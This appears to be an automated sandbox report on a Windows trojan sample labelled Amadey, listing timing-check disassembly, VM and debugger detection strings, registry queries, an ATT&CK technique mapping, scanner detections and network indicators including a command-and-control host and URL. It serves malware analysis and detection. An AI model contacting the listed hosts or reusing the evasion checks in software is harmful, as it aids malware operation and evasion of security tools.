Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11192DE second address: 1119311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FBCC4EB33A6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FBCC4EB33B0h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jnp 00007FBCC4EB33A8h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1119311 second address: 1119315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111949C second address: 11194A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194A0 second address: 11194B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194B5 second address: 11194BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194BA second address: 11194C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FBCC4DE8CC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194C7 second address: 11194CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1119635 second address: 111964D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CCDh 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111C7DB second address: 111C7E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111C7E1 second address: 111C7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111C7E7 second address: 111C7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F268 second address: 111F26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F26C second address: 111F272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F272 second address: 111F278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F278 second address: 111F287 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F287 second address: 111F28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F28B second address: 111F29A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F29A second address: 111F2A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBCC4DE8CCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F300 second address: 111F304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F304 second address: 111F30E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F30E second address: 111F318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBCC4EB33A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F318 second address: 111F31C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F5F2 second address: 111F5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F5F9 second address: 111F61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBCC4DE8CC6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop esi 0x00000015 push ecx 0x00000016 ja 00007FBCC4DE8CC6h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F61F second address: 111F628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F628 second address: 111F62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F8AD second address: 111F910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FBCC4EB33A8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 stc 0x00000025 push dword ptr [ebp+122D1B60h] 0x0000002b add edx, 27D1B4B7h 0x00000031 call 00007FBCC4EB33A9h 0x00000036 jl 00007FBCC4EB33B8h 0x0000003c pushad 0x0000003d push eax 0x0000003e pop eax 0x0000003f jmp 00007FBCC4EB33AEh 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jnl 00007FBCC4EB33A6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F910 second address: 111F91A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F91A second address: 111F950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FBCC4EB33ADh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F950 second address: 111F954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F954 second address: 111F98F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCC4EB33B9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F98F second address: 111F994 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D05 second address: 1120D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D09 second address: 1120D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBCC4DE8CC8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D1D second address: 1120D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D35 second address: 1120D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D4A second address: 1120D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1122B84 second address: 1122BA0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jng 00007FBCC4DE8CC6h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FBCC4DE8CC6h 0x00000016 ja 00007FBCC4DE8CC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11226DC second address: 11226E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11247DF second address: 11247EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBCC4DE8CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A006D second address: 70A0073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0073 second address: 70A0079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0079 second address: 70A007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A007D second address: 70A008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A008B second address: 70A00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBCC4EB33B4h 0x0000000a sub al, 00000018h 0x0000000d jmp 00007FBCC4EB33ABh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00B4 second address: 70A00CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00CC second address: 70A00DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00DB second address: 70A00E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00E1 second address: 70A0123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007FBCC4EB33B6h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBCC4EB33B7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0123 second address: 70A0158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCC4DE8CD2h 0x00000009 sbb cx, EA98h 0x0000000e jmp 00007FBCC4DE8CCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov dl, al 0x0000001d mov dx, B812h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Special instruction interceptor: First address: D9DB07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Special instruction interceptor: First address: F41E90 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Special instruction interceptor: First address: F421F0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Special instruction interceptor: First address: F6EFC7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Special instruction interceptor: First address: FD1F89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Code function: 0_2_070705E9 rdtsc 0_2_070705E9
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe API coverage: 2.9 %
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe TID: 8124 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe File Volume queried: C:\ FullSizeInformation
Source: j6Nv9kUydV.exe, j6Nv9kUydV.exe, 00000000.00000002.1740088892.0000000000F25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: j6Nv9kUydV.exe, 00000000.00000002.1740716394.00000000018F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: j6Nv9kUydV.exe, 00000000.00000003.1332536006.0000000001882000.00000004.00000020.00020000.00000000.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1332929179.0000000001885000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: Amcache.hve.4.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: j6Nv9kUydV.exe, 00000000.00000002.1740088892.0000000000F25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Code function: 0_2_07070849 Start: 07070C57 End: 07070862 0_2_07070849
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe File opened: NTICE
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe File opened: SICE
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe File opened: SIWVID
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Code function: 0_2_070705E9 rdtsc 0_2_070705E9
Source: j6Nv9kUydV.exe, j6Nv9kUydV.exe, 00000000.00000002.1740088892.0000000000F25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (EProgram Manager
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: global traffic TCP traffic: 192.168.2.10:49716 -> 185.121.15.192:80
Source: global traffic TCP traffic: 192.168.2.10:49717 -> 185.121.15.192:80
Source: global traffic TCP traffic: 192.168.2.10:49723 -> 185.121.15.192:80

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 24 Virtualization/Sandbox Evasion; 2 Process Injection; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 751 Security Software Discovery; 24 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 Remote System Discovery; 214 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label
j6Nv9kUydV.exe | 66% | ReversingLabs | Win32.Trojan.Amadey
j6Nv9kUydV.exe | 100% | Avira | TR/Crypt.TPM.Gen
j6Nv9kUydV.exe | 100% | Joe Sandbox ML |
No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fivetk5vt.top | 185.121.15.192 | true | false | | high
httpbin.org | 98.85.100.80 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745 | false | | high
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp | false | | high
